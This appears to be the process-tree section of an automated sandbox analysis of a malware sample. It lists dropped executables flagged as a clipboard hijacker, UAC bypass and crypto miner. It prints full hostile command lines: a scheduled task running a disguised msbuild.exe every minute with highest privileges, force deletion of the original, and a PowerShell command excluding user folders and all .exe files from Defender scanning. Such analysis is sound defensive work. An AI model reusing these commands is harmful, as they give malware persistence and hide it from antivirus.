                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:10:25:28
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                          Start time:10:25:28
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 432 -s 1216
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                          Start time:10:25:29
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                          Start time:10:25:40
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\spczxf.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\spczxf.exe"
                                                                                                                                                                                          Imagebase:0x1a4b0800000
                                                                                                                                                                                          File size:774'166 bytes
                                                                                                                                                                                          MD5 hash:D76027FE4CFD48C7F8999C796E50E731
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000008.00000002.1738420103.000001A4C3F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1736044836.000001A4B2722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 41%, ReversingLabs
                                                                                                                                                                                          • Detection: 48%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                          Start time:10:25:51
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                                                                                                                                                                                          Imagebase:0x7ff66f7d0000
                                                                                                                                                                                          File size:45'448 bytes
                                                                                                                                                                                          MD5 hash:10072393B2116AF4483194F101923CA4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                          Start time:10:25:51
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                          Start time:10:25:51
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                          Start time:10:25:52
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                          Start time:10:26:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe"
                                                                                                                                                                                          Imagebase:0x7ff7fe540000
                                                                                                                                                                                          File size:45'448 bytes
                                                                                                                                                                                          MD5 hash:10072393B2116AF4483194F101923CA4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                          Start time:10:26:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                          Start time:10:26:39
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\ohvrxt.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\ohvrxt.exe"
                                                                                                                                                                                          Imagebase:0x1b042450000
                                                                                                                                                                                          File size:17'267'312 bytes
                                                                                                                                                                                          MD5 hash:D01B812C108576056594805B6E9E7064
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2223610242.000001B044693000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 62%, ReversingLabs
                                                                                                                                                                                          • Detection: 50%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                          Start time:10:26:39
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\hgzxhw.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\hgzxhw.exe"
                                                                                                                                                                                          Imagebase:0x292620c0000
                                                                                                                                                                                          File size:402'454 bytes
                                                                                                                                                                                          MD5 hash:3F3A51617811E9581ABA50376599EFA6
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2341667196.00000292640E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          • Detection: 35%, ReversingLabs
                                                                                                                                                                                          • Detection: 49%, Virustotal, Browse
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                          Start time:10:26:42
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                                                                                                                                                                                          Imagebase:0x7ff66f7d0000
                                                                                                                                                                                          File size:45'448 bytes
                                                                                                                                                                                          MD5 hash:10072393B2116AF4483194F101923CA4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                          Start time:10:26:42
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                                                                                                                                                                                          Imagebase:0x7ff66f7d0000
                                                                                                                                                                                          File size:45'448 bytes
                                                                                                                                                                                          MD5 hash:10072393B2116AF4483194F101923CA4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                          Start time:10:26:42
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                          Start time:10:26:42
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                          Start time:10:26:48
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                          Start time:10:26:49
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                                                                                          Imagebase:0x7b0000
                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                          Start time:10:26:49
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                          Start time:10:26:49
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                          Start time:10:26:50
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                          Start time:10:26:50
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                          Start time:10:26:50
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                          Start time:10:26:50
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                          Imagebase:0x5d0000
                                                                                                                                                                                          File size:12'800 bytes
                                                                                                                                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                          Start time:10:26:50
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:ping 127.0.0.1
                                                                                                                                                                                          Imagebase:0xc0000
                                                                                                                                                                                          File size:18'944 bytes
                                                                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                          Start time:10:26:52
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\utntwb.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\utntwb.exe"
                                                                                                                                                                                          Imagebase:0x1bc8e4e0000
                                                                                                                                                                                          File size:3'288'598 bytes
                                                                                                                                                                                          MD5 hash:86E00D529B3B454A84B942AC916211E3
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 46%, ReversingLabs
                                                                                                                                                                                          • Detection: 32%, Virustotal, Browse
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                          Start time:10:26:54
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
                                                                                                                                                                                          Imagebase:0x3b0000
                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                          Start time:10:26:54
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
                                                                                                                                                                                          Imagebase:0x60000
                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                          Start time:10:26:55
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                          Start time:10:26:55
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                          Imagebase:0x7ff7e3ed0000
                                                                                                                                                                                          File size:171'008 bytes
                                                                                                                                                                                          MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                          Imagebase:0x7ff7e3ed0000
                                                                                                                                                                                          File size:171'008 bytes
                                                                                                                                                                                          MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
